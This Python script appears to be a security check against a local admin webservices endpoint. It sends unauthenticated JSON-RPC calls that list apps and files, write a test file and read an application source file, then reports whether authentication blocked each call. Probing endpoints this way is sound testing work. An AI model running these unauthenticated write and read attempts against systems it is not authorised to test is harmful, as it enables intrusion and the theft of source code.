#!/usr/bin/env python3
"""
Send unauthenticated JSON-RPC calls to the admin webservices endpoint to check whether authentication is enforced
"""

import requests
import json
import base64

# Base URL of the instance under test: a local deployment reached over HTTPS
# on port 5000. Every request in this script is built from this value.
BASE_URL = "https://localhost:5000"

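def test_jsonrpc(method, params=None):
    """Call one JSON-RPC method on the admin webservices endpoint without credentials.

    The request carries no cookie, token or Authorization header, so the
    reply shows how the endpoint treats an unauthenticated caller.

    The HTTP status alone does not answer that question: ``requests`` follows
    redirects by default, so a 200 may be a login page reached through a
    redirect rather than the result of the call. The function therefore also
    prints the final URL when a redirect happened and a verdict derived from
    the JSON-RPC body.

    Args:
        method: JSON-RPC method name to invoke.
        params: Positional parameters for the method; defaults to an empty list.

    Returns:
        The ``requests.Response`` on success, or ``None`` when the request
        failed at the transport level (connection refused, timeout, TLS error).
    """
    if params is None:
        params = []

    payload = {
        "jsonrpc": "2.0",
        "method": method,
        "params": params,
        "id": 1
    }

    url = f"{BASE_URL}/admin/webservices/call/jsonrpc"

    print(f"\n[*] Testing {method}")
    try:
        # json= serialises the payload and sets Content-Type: application/json.
        # verify=False skips certificate validation, presumably because the
        # local instance uses a self-signed certificate; the peer is not
        # authenticated, so this setting is only appropriate for a local target.
        response = requests.post(url, json=payload, verify=False, timeout=5)
    except requests.RequestException as e:
        # Only transport failures are reported as "Error"; a programming
        # error (e.g. unserialisable params) is left to surface as a traceback
        # instead of being mistaken for an unreachable endpoint.
        print(f"    Error: {e}")
        return None

    print(f"    Status: {response.status_code}")
    print(f"    Response: {response.text[:200]}")

    if response.history:
        # A redirect chain usually means the server sent the caller elsewhere
        # (typically a login page) instead of executing the method.
        print(f"    Redirected to: {response.url}")

    try:
        body = response.json()
    except ValueError:
        body = None

    if response.status_code in (401, 403):
        verdict = "rejected by HTTP status (authentication enforced)"
    elif isinstance(body, dict) and "result" in body and body.get("error") is None:
        verdict = "result returned without credentials - review access control"
    elif isinstance(body, dict) and body.get("error") is not None:
        verdict = "JSON-RPC error returned (call rejected or failed)"
    else:
        verdict = "no JSON-RPC reply (login page, redirect target or other content)"
    print(f"    Verdict: {verdict}")

    return response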

_rule = "=" * 60

print(_rule)
print("Testing Admin Webservices Endpoints")
print(_rule)

# Body used by the write_file check below.
test_content = "# test file\nprint('hello')"

# Each entry is (method, params); every call is sent without credentials.
# NOTE(review): if write_file is accepted, "test.txt" is left on the server
# and has to be removed after the run.
_unauthenticated_calls = (
    # Are the endpoints reachable at all without authentication?
    ("login", None),
    ("list_apps", None),
    ("list_files", ["welcome"]),
    # A write must be refused when authentication is required.
    ("write_file", ["test.txt", test_content, False]),
    # A read of application source must be refused as well.
    ("read_file", ["welcome/models/db.py", False]),
)

for _method, _params in _unauthenticated_calls:
    test_jsonrpc(_method, _params)

print(f"\n{_rule}")
